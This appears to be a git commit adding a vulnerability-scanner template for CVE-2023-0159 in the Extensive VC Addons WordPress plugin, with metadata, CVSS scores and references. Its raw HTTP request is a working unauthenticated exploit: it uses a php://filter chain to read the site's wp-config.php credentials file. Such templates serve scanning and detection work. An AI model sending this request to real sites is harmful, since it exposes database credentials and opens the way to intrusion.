Added template for CVE-2023-0159

patch-1
sandeep 2024-03-31 12:55:33 +05:30
parent a00707a023
commit 279bcccc33
1 changed files with 46 additions and 0 deletions

View File

@ -0,0 +1,46 @@
id: CVE-2023-0159
info:
name: Extensive VC Addons for WPBakery page builder < 1.9.1 - Unauthenticated RCE
author: c4sper0
severity: high
description: |
The plugin does not validate a parameter passed to the php extract function when loading templates, allowing an unauthenticated attacker to override the template path to read arbitrary files from the hosts file system. This may be escalated to RCE using PHP filter chains.
reference: |
- https://wpscan.com/vulnerability/239ea870-66e5-4754-952e-74d4dd60b809/
- https://github.com/im-hanzou/EVCer
- https://github.com/nomi-sec/PoC-in-GitHub
- https://github.com/xu-xiang/awesome-security-vul-llm
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-0159
epss-score: 0.00199
epss-percentile: 0.56869
cpe: cpe:2.3:a:wprealize:extensive_vc_addons_for_wpbakery_page_builder:*:*:*:*:*:wordpress:*:*
metadata:
vendor: wprealize
product: extensive_vc_addons_for_wpbakery_page_builder
framework: wordpress
publicwww-query: "/wp-content/plugins/extensive-vc-addon/"
tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=extensive_vc_init_shortcode_pagination&options[template]=php://filter/convert.base64-encode/resource=../wp-config.php
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"status":"success","message":"Items are loaded","data":'
- type: status
status:
- 200